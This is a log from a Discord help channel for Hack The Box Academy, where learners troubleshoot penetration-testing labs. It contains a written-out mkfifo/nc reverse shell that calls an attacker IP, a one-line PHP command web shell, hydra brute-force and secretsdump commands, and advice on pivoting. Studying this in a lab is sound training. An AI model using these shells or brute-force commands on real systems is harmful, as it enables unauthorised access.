WE don't know/care

crime can you help me pleasese i cant talk in general chat i odonkt know why

can you help me i cant talk in general chat

You should read #rules and #welcome

ookk

i cant i dont know whyy

It litteraly tells you what to do in #welcome: #welcome message

do i neeed to havee htb account to aaccess general chatt

Yes.

okk thanks you

I see it. Cracking into HTB is the path (a collection of modules) then the module / section is Getting Started > Service Scanning:
In this lab a simple "nmap -sV $RHOST" should net you results so it's likely a technical issue. Restart the lab and your VPN is my only suggestion.

Did you install the requirements?

yes

Also /api isn't the endpoint

The web fuzzer fuzzes for endpoints

So drop the /api at the end, that's likely causing issues

Oh nvm I see you tried that

I did bro... I tried everything

It looks like the error as well is more in your python environment than it is with the tool

can I DM you for this problem ? or we can talk here ?

I genuinely didn't have any issues running it (my python env is 3.11)

same.. my system is upto date

¯_(ツ)_/¯

Let me try again... with some changes

Try doing it in the pwnbox see if the issue persists

i have a problem sshing in a module

/module/115/section/1105

it says no route to host. i tried reseting the machine

What's the actual module and section name

shells and payloads / bind shells

No route to host generally means you don't have the vpn running

it is running

let me reset that too

Are you running it in the vm?

yes

i always had, first time that something is not working

can't even nmap it, so yeah might be something from the vpn, let me get a new conf

yeah, works now, thanks

hi i have problem with who can help me

secretsdump.py -outputfile inlanefreighthashes -just-dc-user syncron INLANEFREIGHT/adunn@172.16.5.5 it is not work

DCSync AD

I try to connect to the Server with the Command:
mysql -u robin -probin -h 10.129.19.20
but i got no connection bebause this:
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
What can i do. I tried to google it but i cant find any solution.

Sorry i am in MySQL Footprint

did u specify port?

im not seeing your port specified here.

may be inconsequential but definitely do a sanity check

Works for me in pwnbox. I don't know why your client is validating the cert, that's not enabled by default at least in kali / pwnbox.

You could manpage mysql client to see if there's a flag to ignore SSL.

thanks i will try this

who can help me

I try to do evilwinrm over proxychains with PTH. I have the right hash and creds, and i have configured an ssh tunnel before hand. However i keep getting denied, any idea why

I really at a loss with the firewall evasion - hard lab in the nmap module. I've followed the examples (apparently that's the solution) and yet it just doesn't work.

||The target port is showed open when nmaping with source port 53, and yet ncat shows "connection refused" using that same source port.||

I don't get it.

It sounds like you should have the solution. Do you want to share the command you're using?

Nevermind. I forgot to use sudo with ncat 🤦‍♀️

And I was on it for hours. I've juste realized that the error message I got was not from the target, but from my VM.

Hi @jaunty mortar , I have the same issue ... did you receive some help ? I'm stuck for 2 weeks ... I bypass the filter via object and base64 but can trigger admin content. Can you help me ?

Looking for help on the Web service & API attacks skills assessment. I have got the properly formatted XML document, and sent it to burp via the python automate script. In repeater I got it to return in the SQLI payload with a user with the password, I tried submitting the payload with admin and the password, but am not getting anything. Am I missing something , or do I need to submit a different payload that will spit out the flag?

Anyone able to point me in the right direction in how I can edit this YARA rule?
From https://academy.hackthebox.com/module/234/section/2514

I just started doing sherlocks, and wanted to play around with splunk for unit42 for some reason i cant import the event logs. Anyone had this issue before? Running linux for the sake of learning that while doing sherlocks so i wanna avoid using the windows event viewer

nevermind, solved

Think I used this https://github.com/whikernel/evtx2splunk

For most Sherlock’s you want a windows vm tho

https://academy.hackthebox.com/module/116/section/1169
Hey guys, I'm getting the same error.

can someone please help me with a hint -

Password:
mssql: login error: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.```

this is not a question bout the answer answer its a question bout names
https://academy.hackthebox.com/module/57/section/516

the LAST question
skillss assessment.
||
it had been talking about harry potter the WHOLE time but the name they use is harry.potter not harry potter

it says from the question before but that was not the name from there ether. that one again was harry potter. ||

HOW am i suppose to know this. per name said something like it would take 98 HOURS to do. the vm only stays up 90 min lol
where why and how did the dot get there ?

somebody get back to me maybe i missed this with out a walkthough it would hhave taken weeks to months if ever to find this.

it does say "Also, try using the 'username-anarchy' tool to generate potential usernames for the employee" but that gives me a few hundred i legit dont have the time for that

I'm not at that module yet so this seems like a spoiler even if you changed the name... but are you following the CPTS path? Isn't there some way you can automate the validation of a list of users?

cbbh no it talks about it

im more asking if it has to be listed or if i missed it.

when i said i dont have time i ment it tho like there is not enough time. to do 100's of names

You would use username-anarchy to create a plausible list of login ID's from just names (e.g. harry potter = hpotter, potterh, harry.potter, etc.) then you would have a narrow list of guesses for further attacks rather than a gigantic, generic list of usernames.

I can see the confusion if they haven't covered any other means of validating user lists / attacking passwords yet.

It is the skills assessment though. What if you just ran the name list & a password dictionary through an automated login tool? It might be hundreds of combinations, but AFAIK that's the way its done.

Again, I'm not there yet so you might be onto something. I'm just talking from my current POV.

ya but you have to test each one so the time needed is like months

You'll have to wait for someone else to speak up. I can't say you're wrong, but I suspect there's got to be a way of automating the process.

well making the list and testing each name i understand the concept just not how im suppose to finish in 90 min XD i also get the password part even thin down the list per there instructions it would still take months. the only way i got it done was the walkthough to get the name then just did the assignment as i kept running out of time.

per name even on the smaller list is something like 1 hour to 8 hours i forgot now but its looong.

how are you testing usernames

It really wouldn't take long to get it...

1 by 1

my pc disagrees with you

You don't have to "test each username"

Module - Advanced NTLM Relay Attacks Targeting AD CS

Curious what you guys are doing to get around this error? I've run into it several times and have always been able to use passthecert.py to get around it, wondering what other ways there are? I also tried what HTB suggested with npupdate

Hydra has a switch that says to loop through usernames instead of passwords

i forget the skills assessment but you should be able to determine the right one pretty quickly

It doesn't take long for it to find the right password and username

i must be dumb then as i do not understand how to narrow the name list down i understand how to do the pw list just not the name list

This is the last assessment yeah?

in the prev section it just gives you the name the one after you get part of a name though burp

yes its the last

The username list can be looped through instead of password list, -u

Takes significantly less time

can i pm you to avoid spoilers for others ?

No 🗿

okay dokay sorr to bother you

But fr you just throw the name at username-anarchy

Also: expected time != actual time

The expected time is the theoretical time to go through both lists

It doesn't magically know your user/pass

It's saying; "if we go through the whole list, it will take that long"

but fr i get 100's of names . again thus is the issue i didnt get so it has to do each name + pw so im looking into this -u you are talking about

It's discussed in the module lol

All it does is loop through the username list instead of password list

So it goes username{1..X}:password1
Instead of
username1:password{1..200}

Hello

I need some help with https://academy.hackthebox.com/module/216/section/2300

+ 1 Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer.```

must have missed it i understand how to generate it, and run vs with the pw but i guess im missing something.

In multiple places in the module it tells you

Your post contained the answer to the previous question @rustic sage thats why it was deleted

It doesnt work

Its not an answer

Plus

Read it carefully

Enter the time of the identified event in the format HH:MM:SS as your answer. --This is what the answer is supposed to be

Can I please have help without my stuff being deleted? Please? I just want some help

It contained the answer to the previous question :)

Im confused?

OH

Wait, where?

Anyway you'll need an AND query

The t..exe

Was that in the query? Ill have to double check

Sorry for putting it here!

It was in what you posted

💀

I also don't believe you need to narrow it down to a specific log type

Instead of searched for the event.code im going to search for the .dll alone.

Yeah

Yep

im doing the BBH -> SQLMAP -> SQLMAP on HTTP REQs module

https://academy.hackthebox.com/module/58/section/517

and the lab has 11 cases to complete, only 4 are are flagged, the others, the 5th im currently on, is requesting us to exploit a OR injection with GET request, and im having trouble getting sqlmap to do this... it seems to start out with an AND and go no further... plugins were not discussed in the module.

So you're on case#4?

case $5

#5 only say that to say im actually trying to learn this stuff so im doing all the cases regardless of whether a flag is required.

@fathom pendant Thank you for trying to help! I really appreciate it. I'm glad you caught on to my posting of one of the answers, I wouldn't have of caught it, so thank you! I figured it out. I just constructed an XML query to find the .dll file. I used ChatGPT to construct it 🙂

? #5 isn't on this page, I'm referring to the case in parenthesis

let me double check my link right quick. its on the targets web server

https://academy.hackthebox.com/module/58/section/517

oh i see what you're saying yeah its not a flag, its on a list of 11 cases on the target webserver, only 3-4 of them are flags, im actually trying to learn this so i want to complete them all

Module: Linux privilege escalation
Section: Docker
I have problem with solving this module. I don't really understand even how to start with this thing. I'm assuming I should run this docker instance on the host target, but how do I find docker image file? Besides that I was only able to run

docker -H unix:///run/docker.sock ps

command instead of

docker -H unix:///app/docker.sock ps

because it prompted me about docker not being active

#5 is on the attack tuning session

is that gonna be the next section?

The docker instance is already running

oh i see

thx marcie.

2 sections, there's a reading one in between

does htb academy now only accepts credit card for payment?

okay so what's the reason it "doesn't" work

i thought it'll list available docker instances

Hold on

docker image ls

oh

thanks for that. is the command difference caused by other distro or something?

Also is docker.sock in that location?

:)

I thought that's something wrong when it showed no instances

Look at the exact things; it's showing the command running on a port

It's not showing the containers that are running

okay thanks!

Hey guys is there a ticket system to report a bug/issue?

Depends; if it's a module issue -- #1234357888114364508 if it's a site issue message support

I have tried looking above but couldn't see too much when I searched. I am on the information gathering - DNS Zone Transfers.. How much am I allowed to disclose? I am stuck on the first question I run dig against the inlanefreight.htb (added to my /etc/hosts file) I only get one DNS back, I went to the zonetransfer.me site just to get some more guidance. Other than watching some DNS Zone Transfer Content to understand it is there anything else I can do? I have attached my initial try

You're misunderstanding what's being asked to do

ok no worries, I will try finding some more education pieces and try again

Zonetransfer.me is a website to demonstrate zone transfers with its not actually something you need to query for this. It was being used in the section for demonstration purposes only

The dig syntax is
dig axfr domain @ip/nameserver

Gotcha thanks

Think I need to do some more education on it.. at least I know what I was doing was wrong

Just gotta separate example from what you need to do

yeah when I read the digi ninja site it literally says to use as an example. Ok, thanks anyway. I will park it for the moment. I'll get more familiar before I ask again

Hey im doingatacking wordpress section the question to find to find another user present against blog.inlanefreight.local . I ran /etc/passwd to find anyuser leveraging a command execution vulnerability from a plugin but i cant seem to find the user any tips

ok so part of my problem was anarchy didn't generate names but said it did. was givng me empty files (this explains A LOT )

still does not help speed this up

[DATA] attacking ssh://iphere:porthere/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 3340 to do in 00:42h, 10 active
[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active  ``` but guess i will give it like 20 min see what happens

Oh that's weird but glad you resolved that bit

i never thought to check names i wont lie i was checking pw list and it was doing that

but names were blank files

i removed it replaced it and now it works fine no idea why how it broke tho

¯_(ツ)_/¯

https://tenor.com/view/hello-old-people-computer-technology-biff-gif-12085559

i doubled check and i was doing -u i was confused about the looping part you were talking about as i was doing that but i mean i see now why it didnt work

Is it bad I could recognize it as Dell from the back panel alone?

[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active

this is min not hours right?

Yea

I believe so at least

welp back in 30 min or so 🤓 see if it worked or not other wise im still in the " how do i have time for this" area

I think it's displayed as HH:MMh

https://academy.hackthebox.com/module/112/section/1069 I am working on this module - Footprinting -> DNS -> What is the FQDN of the host where the last octet ends with "x.x.x.203"?

For some reason, I can't seem to get the answer. I've tried ||inlanefreight.htb & internal.inlanefreight.htb||

What am I missing?

||dnsenum --dnsserver 10.129.121.184 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
dnsenum VERSION:1.2.6

----- internal.inlanefreight.htb -----

Host's addresses:

Name Servers:

internal.inlanefreight.htb NS record query failed: REFUSED||

As you see it said it did work in 00:07h (7 minutes)

75 mine on the box 45 min to pw (im guessing)

ya just double checking

Use a different subdomain

Likely less

its a old alienware its all i got for a hackbox so the videocard is utter trash dont judge me

Dude

I'm running on an i5 7500U, with a 1050ti gfx card

Also the video card wouldn't matter for this

As you're not cracking a hash

You're bruteforcing a password

Any help ?

Is it another WordPress user? If so, it won't be under /etc/passwd

iirc wp-users is where users may be

its a i7 but the video card is like Radeon HD 6790/6850) that i replaced the 750/780 or whatever it was when it poped (like actually went POP )

Either way gfx card isn't a factor here

Got it used wp scan itself

is HTB okay right now? cant rdp from my vm, cant start pwnbox

nvm im an idiot

i live in this state of being welcome

[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active                      
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active                      
[STATUS] 64.00 tries/min, 960 tries in 00:15h, 2460 to do in 00:39h, 10 active                      
[STATUS] 62.81 tries/min, 1947 tries in 00:31h, 1473 to do in 00:24h, 10 active                     
[STATUS] 62.75 tries/min, 2259 tries in 00:36h, 1161 to do in 00:19h, 10 active                     
[STATUS] 62.39 tries/min, 2558 tries in 00:41h, 862 to do in 00:14h, 10 active                      
[STATUS] 62.24 tries/min, 2863 tries in 00:46h, 557 to do in 00:09h, 10 active                      
[STATUS] 62.35 tries/min, 3180 tries in 00:51h, 240 to do in 00:04h, 10 active                      
1 of 1 target completed, 0 valid password found                                   ```  i know im doing this right and i know the name and pw are in there so im missing something but im done for today / rn.

question

for the password portion

did you allow it to l33t?

and add characters?

:)

i mean

yes i already know the name / pw and checked and its in there

i hope that's a typo

rofl

-l is username whereas -L is the list

so you were literally passing 'username.txt' as the user

<@&861185840277487616>

the hell is a macherino

thats a 30 min type-0 error yup.. ya got me

i even have -L in my notes and put -l im special

Welcome

Hey i got a shell into the domain in attacking wordpress section and i have command execution i got the uid command after that i type in many commands to find the flag none seem to work most returns me nothing

find / -name "*flag*.txt" 2> /dev/null

wow that took 10 seconds im gonna go kick myself ☠️ when file was empt i used -L when file not empty i used -l
yeesh break time ty all

O7

At least you were willing to go back and check yourself on it

Instead of claiming "lab broken"

no i only had 1 broken lab so far

and it was confirmed broken

Still nothing

Whats the exact wording of the question

Folloeing the steps in section obtain code ececuton on host and submit contents of the flag.txt file on webroot

on the webroot

you are in the wrong folder XD

There's your keyword there

I did ls /var/www/flag.txt

Generally webroot is /var/www/html

And many such command but it returns me

idk mine might be broken lol jk but seriously target win box keeps kicking me out, connection aint stable i guess

Hdkdjsjsj-1384949.php

Did you check /var/www in general?

cmd=ls /var/www/

Got nothing but that jiberish.php

If there's vhosts at work: sometimes the webroot is /var/www/<vhost>/

¯_(ツ)_/¯

when you do the command of marcie not forget replace space at +

Did that too blog.inlanefreight.local

Still that jiberish.php

find+/+-name+"flag.txt"+2>/dev/null

Is this the common services module?

Now eberything works

Darn forgot that +

Yeah lol

Got the flag section done after 20 mintues of missing a +

I understand the frustration, but I never forget it more when I do a remote code execution on web

I was very happy i got the shell in and cmd execution possible when i got uid

Either + or %20

I thought this was done then LOL TOOK ME 20 MINUTES MORE

Url encoding is great

it's true, I'm not used to it yet, but I have to be, because it's always there the %20

hey @fathom pendant ,

im still working that SQLmap module -> Attack tuning section (i just LOVE sql)...

https://academy.hackthebox.com/module/58/section/526

case #6 ... i already solved the prefix portion (manually) do you know if we were supposed to use risk/level to acquire the prefix?

if i understand it correctly, its supposed to fuzz sql vector boundaries but god it was taking so long... then in the solution it sorta acts like youre just supposed to know it before starting the sqlmap scan (along with utilizing the prefix)

yes you're meant to use the risk stuff

but the prefix stuff is just found in the reading

i'm sure there's some cheatsheet out there with common prefixes

the solution shows them utilizing the prefix stuff prior to the scan tho? maybe thats just a small content oversight?

like as though you're supposed to manually find it? dunno

it's in the reading

afaik

yes it is, but it just sorta "appears" without explanation in the solution. i guess one can make a leap in logic, just want to be sure im approaching it how "it" wants

¯_(ツ)_/¯

you just keep pivoting until the end

the last 2 questions are solved by the same machine

then dig for another set of creds

¯_(ツ)_/¯

each hop has unique creds

it says to find shadow.bak but there is no such shadow.bak in that directory

are you ssh to the target?

i am using vm instance

it is vf

do i still need to ssh?

yes but there should be a target you need to ssh into

oh

<click here to spawn target>

got it

Is HTB openvpn academy 5 server down? I cannot connect to the VPN.

¯_(ツ)_/¯

try a different region

@fathom pendant Thank you!

I have an error message from hydra, “all children were disabled “”

Anyone help me

I am stuck in attacking common service

generally means you were sending too many threads

and the port stopped responding

How I can solve that??

don't use as many threads

shrimple as

Without -t 64 ?

yes

lmao

Okay 😂😂

But not working

If it's the mail services section that's wayyyyy too many

What I should do

Wdym "not working"

The hydra itself

That doesn't help at all

Yeah I am using port 25

?

I assume you used smtp-user-enum to get a user@domain

I got the user already

But now I am working to find the password

Yes and when bruteforcing for pw you don't include the @domain

From what I recall

I include it

no

what i'm saying is you don't use @domain in your hydra command

so -l user without the @domain

I used that with the domain 👍🏻

if you're attacking smtp, you do need to include the @ domain

I know that

I mean even though It is not working

use rockyou

instead of the provided wordlist

This is my command : hydra -l fi****@inlanefreight.htb -P'/usr/share/wordlists/rockyou.txt.gz' -f 10.129.****smtp

But not working as I told you

wait

I guess you should extract the word list

is this the email section or the skill assessment

Not that the issue

Skill assessment

if it's the skill assessment then you DON'T use the @domain

Why ?

i was thinking you were on the Email section, since you didn't specify what you were doing

It is the same

also go for imap://

instead

or another protocol

smtp may not have authentication enabled on this server

Okay!!!

I got it now

@reef pecan the spider takes a long time and eventually finds it

please refrain from posting spoilers as well; from my understanding to make it faster -- you should first identify pages that may have input and spider/target those

instead of the website as a whole

which can take up to 30+ minutes

I see, it keeps running. I thought it had already finished.
Thanks

yeah

hi guys when i try to go to that address "files/shell.aspx" it doesnt work

and I cant remember how I did it previously but I dont think I understood it which is why I'm asking for clarification

prefix with //

okay let me try

instead of single

ok hold on

this comes up again

oh wait

I dont think I edited the file itself

😂

I dont seem to have the antak webshell, where can I download it from?

https://github.com/samratashok/nishang/tree/master/Antak-WebShell

Have you tried googling?

first result on google

"Antak Webshell"

Document your process as soon as possible. I use NotesNook, veri convenient to have the previous procedures documented for when I come accross the same problem again.

yess thanks guys found it

thank you, I am taking notes in my obsidian

Can you tell me as to why this command is not working?

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

I'm getting:

/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
rm: cannot remove '/tmp/f': No such file or directory

I'm doing nibbles

Getting Started - Nibbles - Privilege Escalation

do you get something in your listener when you run it though?

:)

also make sure you replace 10.10.14.2 with your tun0 IP

Yeah that's what I did

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.156] from (UNKNOWN) [10.129.193.185] 58584

then it's working

and you shouldn't concern yourself with the error presented

oh ok

basically though it's making sure if /tmp/f does exist, you're deleting it -- then making a pipe to it

specifically a first in first out [fifo] pipe

I need to modify the antak shell with a username and password but htb doesnt provide it

Thanks for clarifying.

you don't

just make sure your ip and port are in it

where applicable

thank u got to this page but its asking for a login

the default creds are in the file

also, why do we switch web shells? like why am I using antak webshell instead of laudenum

okay Ill check

to showcase other shells

can someone please help me with this question and steer me in the correct direction

if you haven't found the default creds, it's on line 12

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: ****\****, 1 space)

thanks I did

whoami

the most universal command across lin/win

ahh yes 😂

how could I forget tht 😂

thankss

if your answer is wrong then you uploaded to the wrong vhost :)

(yes there IS a difference)

nahh its correct hahaha

thank uu

good thing you didn't lose more sanity over it

😂

[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm having a hard time finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?

Did you add a / at the end?

yes 😦
I'm receiving "The connection was reset", but i'm pinging it normally, and my network is 100%

And you specified the port?

yess

Try with curl

Sometimes the browser can be dumb

🤣 🤣 🤣 🤣

Sometimes (for some reason) the browser drops the specified port

Marcielee, I just realized I was the dumb one

Ohno

euiahsieuahsie

I used the wrong port

🤡

uiahsiuehasuh

It do be like that

thank you anyway, i wouldn't have noticed it kkkkk

I'm losing my sanity

Hey guys im on the footprinting module imap pop3 section, do someone know how i can see the content of an email when im in the imap server,

aint we all

https://tewarid.github.io/2011/05/10/access-imap-server-from-the-command-line-using-openssl.html

and

https://www.pantz.org/software/pop3/pop3telnet

life hacks for pop3 and imaps

a FETCH 1 (BODY[TEXT]) Fetches only the body text of the first email.

i use gpt sometimes to find out about commands and put it in my notes

#modules message

Don't include the [TEXT] just the []

Body[]

Fetches all the email info fields

There is also in fact only 1 email

If you want to fetch all emails (if more) you could do a fetch * body[]

But the thing is when i execute my command it deconnects me @placid edge

do i need to include the SELECT and the FETCH in one command?

hi goood afternoon to everyone.

I am trying to solve the following question:

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I saw that there is a forum regarding this, but I still not understand the logic of it.

in the questions they are referring to "unique paths of domain" but I am not sure what this means.

i get that we neet to extract the html info of the page and filter. but what needs to be filtered is what I dont get

oh ok dint know about that

I think I am missing some context of the website stuff that I dont know.

a FETCH 1 FULL i used this as well

This is the only bullshit question, I'd go through the forums to answer

@fathom pendant why you say is bullshit? is it out of the course level?

if its pop3 you can just use retr (index) ex: retr 1

so how can i select the mailbox before fetching? when i do it i have to select a box but i cant do it in one command

show your command as well not just the output

||This is my command curl -k 'imaps://10.129.161.217' --user robin:robin -v -X 'SELECT DEV.DEPARTMENT.INT'||

why are you using curl for this?

use telnet

lol

a select [mailbox name]

Yeah telnet is gonna be way better for this

f

when I try to execute commands on the reverse shell it doesn wrk

anyone have any ideas?

That's not a reverse shell btw

It's a webshell

web shell

yeaa

why isnt it working 😅

dir

That's not the issue

It's unstable

gave me same problem

wht shud I do?

Did you copy the whole code to upload?

Change vpn regions, use tcp instead

yeah its in a php file

damn ok

@tender nimbus careful with posting flags dude

thats why i putted spoiler my bad ^^

Spoiler doesn't do shit

As anyone can click and look at it

here without it

You don't need to wrap it in () btw

btw can I ask why is ur rank noob on htb? 😅

But the body without the square bracket just gives basic info about the message

I don't do boxes

ahh ok

may I ask why not and if u dont do them how do u know so much

I just don't

ahh ok

okej so by doing body[1] i select the first message in the inbox?

I read and a good portion of my knowledge comes from either modules or others

ohh ok makes sense

Yes. If you didn't specify

You can do
a fetch 1 body[] and it'll do the same

Because its windows and dont have ls

It's not windows

okej but imagine if a hive more messages in this inbox?

https://academy.hackthebox.com/module/115/section/1120

Looks like the webshell module thingy.

then i need to specify so if i want to see the body of the third messgae i need todo BODY[3]

now the website isnt loading 😦

yea php web shells

Or 3 body[]

ow okej thanks ^^

As there's more stuff you can actually specify in the brackets

Test if it works with whoami

As its a universal command compared to ls and id

i tried the "sudo -l" as shown in the images on htb it gave same network error. I will try that as soon as it loads again

It's a connection issue

Ah alr. Im working of memory here so i might be wrong but i belive the backend is windows and not linux

It is linux

is this the webshell u are using https://github.com/WhiteWinterWolf/wwwolf-php-webshell ?

It drops you into a .../www/.../ directory

Ah alr

yeaa

Coolio.

Ye I checked the module first to be sure

Anyways i feel like you didnt even open the posts that i sent

try to rename it like connectx.php and upload again. then try to access. ( works fine on me before)

Nor mine

tcp is very slow...since i changed vpn servers its not working properly

okay thanks ill try

of course i did haha that helped me to find out the awnsers ^^

just asking question bcs its not the same in the module

Protip. If you want help you should include your command and output. We cant do shit with only the ouput

Eh, ita reading a email in pop3. Same thing

ikw but some people are removing it bcs my commands can help to find the axnser..

Footprinting lab hard is it safe to say from the description the user is HTB?

Just redact passords and spoilers

User should be included or found prior in the cource most times

If you need a user or its not a part of the challenge

last question why cant i login here with telnet? how can i bypass the error message?

Hmmm

I'm stuck lol

Right port?

or is it here needed to do it on port 993

Looks like thats a imap port

yes it is

but cant connect with the same credentials than on the secure port 993 but why is that?

Are you conneting to pop3 or pop3s

Or imap or imaps

imap

via telnet bcs for imaps its with openssl if im not wrong

same problem

Yeah but there should be a imap and imaps port

Two different ports

I belive

This isnt like a proxy issue is it?

nah

turned it off

Hmm weird

Tried reseting?

yeah

when I enter a command thats the new url

hello

Yo

You are hackers

aspiring

me

Instead of a webshell you could just upload a php system webshell and see if that works.

<?php system($_GET['cmd']); ?>

so upload this in a file?

Ye like test.php

okay lt me try that

And include ?cmd=whoami in the url parameter when you open the file

yeah i know but thats my question why can i connect on imaps port 993 with the credentials abc:abc but not on imap port 143 with abc:abc? i receive this error when i do it

okay let me try

It says that ssl is required

This

Use openssl

okej i understand that so if its the case what can you do on the server?

i did i jsut trying to understand wy it was not working there

Because it requires ssl/tls

is it possible that somethimes there are services where we have acces to but where we cant have interaction with?

You arent allowed to use imap

okej so in this case if it was a real case the imap server was usseles?

No. Depends on their security config

I mean running password over telnet over http is terrible

Or in this case imap

Okej im not that far already to understand everything but thanks for you helps guys 🙂

got an empty screen

Yeah

But include ?cmd=whoami in the url

ok let me try

something worked 😄

You are the user apache

Now you have rce

Do ls now instead of whoami

thanks i got it

I appreciate ur help bro

now im off to play some ea fc 24

Sweet, prob a issue with the webshell or a cleanup script

yeaa

Np

if anyone plays on ps5 lmk and dm

Can i DM someone about this module

https://academy.hackthebox.com/module/136/section/1310
Skills Assessment - File Upload Attacks

I finished it after getting a hint I just have some questions

nevermind I am an idiot

I'm trying to finish the Skill Assesment part 1 of "Active Directory Enumeration & Attacks module" however i'm currently stuck while trying to upload a tool in my victim asset.
I have setup proxychains to access the victim asset with psremote. From there I want to wget the file from my attacker machine.
I tried with evil-winrm however I don't know why I just can't connect to the machine (the port is open though...)

im so tempted to see solution

do u have a port fowrard going to ur http server?

I need to setup it where ? I only setup the proxychains conf and launch chisel on the webserver that I had access to. Then I psremote to the victim asset for which I had an account that could log there

Port Forward ip and then connect with evilwinrm or xfreerdp. Evilwinrm you can just use the upload command, xfreerdp you can link a local drive

thats what i was thinking but i think he said the upload isnt working

I see

Upload chisel or another method to the attack host then upload it that way then you can port forward to your local machine

i dont use chisel but using netsh should work fine

Yeah I prefer chisel but any of the methods will work

Anyway I found an other way to upload my file. I didn't know but with psexec.py you can upload a file. So I did it. Just still I don't understand why I can't evil-winrm into the host...

ligolo is the best

Thanks I will look at it

ontop

If you share screenshots/errors we might be able to help

proxychains4 evil-winrm -i IP -u USER.
I get this. I found that it may be due to the port being closed but from my nmap and netstat I found it to be open so I don't know

it seems like you put in the wrong credentials

I don't think so. The creds are valid for sure. And I tried several time with a copy and paste. I will try again

try put them inside double quotes

Does xfreerdp work?

I didn't try xfreerdp and the lab is over now I didn't see the timeout xD. I will need to setup everything again

the user you are trying to connect to as probably doesn't have the privileges to connect via winrm

I need to check again I probablydid a mistake while doing my enumeration then

Hello guys, please i cant connect to windows server via rdp. Module
Password Attacks:Pass the Ticket (PtT) from Windows

** Attacking Common Services -> Attacking FTP **

Despite covering all bases with ||nmap -T4 -Pn -p- --disable-arp-ping -sCV <IP>|| there literally is nothing there as far as FTP is concerned. What am I missing?

Is --max-retries=0 a problem?

The only services on the box are SSH, DNS, NetBIOS, and SMB. FTP is nowhere to be found.

i just used nmap <ip> -v

and found it

Nope. 22, 53, 139, 445 and nothing else.

try restarting it

rdp is super finicky. increase the timeout, try it a few times, or reset the target

there are other ports ftp can run on

done that already

i will try this

Yes, I'm aware of that which is why I ran it with -p-

Found it after resetting though

its on a kinda known port

normal nmap will find it

sometimes you can also try adjusting -T parameter too

i think i guessed that answer too 😂

how can i paste a screenshot here

get verified, read #welcome

ok

this

timeout isn't a binary to connect to RDP afaik

ahh i see. try xfreerdp with /timeout:100000

also are you sure you're supposed to RDP into it?

does that even fix it

straight up unable to connect

nah its timeout for the session, not for the connection

i reviewed the section i don't even see where they tell you to RDP in

unless it's just to the initial target

ptt from windows? looks like you do need to rdp in

verify correct vpn connection, maybe try xfreerdp or remmina

Someone give me hint on footprinting hard I'm already in ssh trying to find the htb user now

Hello guys! Bringing your attention to this again.

I tried possible combinations with -
servername\username, etc. none worked

the error is right there in the error message, it doesn't recognize that user as a domain user. maybe there's another way to authenticate that isn't against the domain.

like a local DB user?

oh maybe not for that login now that i look at it

well it still says domain user maybe try local

it will use Windows Authentication. If we are targetting a local account, we can use SERVERNAME\\accountname or .\\accountname.
well I tried again now with exact command, it worked. How?

PIVOTING, TUNNELING, AND PORT FORWARDING/SOCKS5 Tunneling with Chisel. Is this another issue with using pwnbox?? ubuntu@WEB01:~$ ls
chisel
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

Nvm I solved I'm so dumb bro

💀

not really sure how i can move forward from here, i'm guessing i need a different version of chisel that is compatible with the pivot host?

yup exactly

but how do i know which one to download?

pivot host is running OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

just by trial and error

i used 1.7.4

could you give me a link?

would this be a good candidate? chisel_1.10.0_linux_386.deb

just go to their releases on github

that's 1.10.0... like it says in the file name. cmon bruh.

i really don't mean to be asking dumb questions, but also I def have a gaping knowledge hole for downloading stuff on my own, like right now i followed the chisel git link they provided, navigated to what i think is different versions, but there are like 85 different links and they all start with chisel_1.10.0 and at the top there is a green tag that says "latest"

yeah, those are the installers/executables for various operating systems. you need to go to releases and find 1.7.6

are you on the pwnbox?

yes, on the pwnbox

idk then, it probably works but i used kali. https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz

i found the releases section at least, that was my problem, i will try the link you provided

it'll be important to know where to get downloads on github, how to compile stuff yourself, and how to download stuff from there. many PoC's use github

ya it's definitely something i need more practice with, i usually just cross my fingers that the links work that htb provides

so do i not need to go build with that link? ls
cacert.der Desktop Downloads Music Public Videos
chisel_1.7.4_linux_amd64 Documents go Pictures Templates

nope

interesting, sometimes (most times) i don't even know what i don't know

so when i use that link and others, it downloads what looks to be a singular file that i need to gunzip, but with the provided htb link it downloaded a package with a bunch of different things. I tried it anyway and got this: ubuntu@WEB01:~$ ls
chisel_1.7.4_linux_amd64
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
-bash: ./chisel: No such file or directory

what does the error say

bash: ./chisel: No such file or directory ??

so you just unzipped a file right.. maybe type ls to see the file name

ubuntu@WEB01:~$ ls
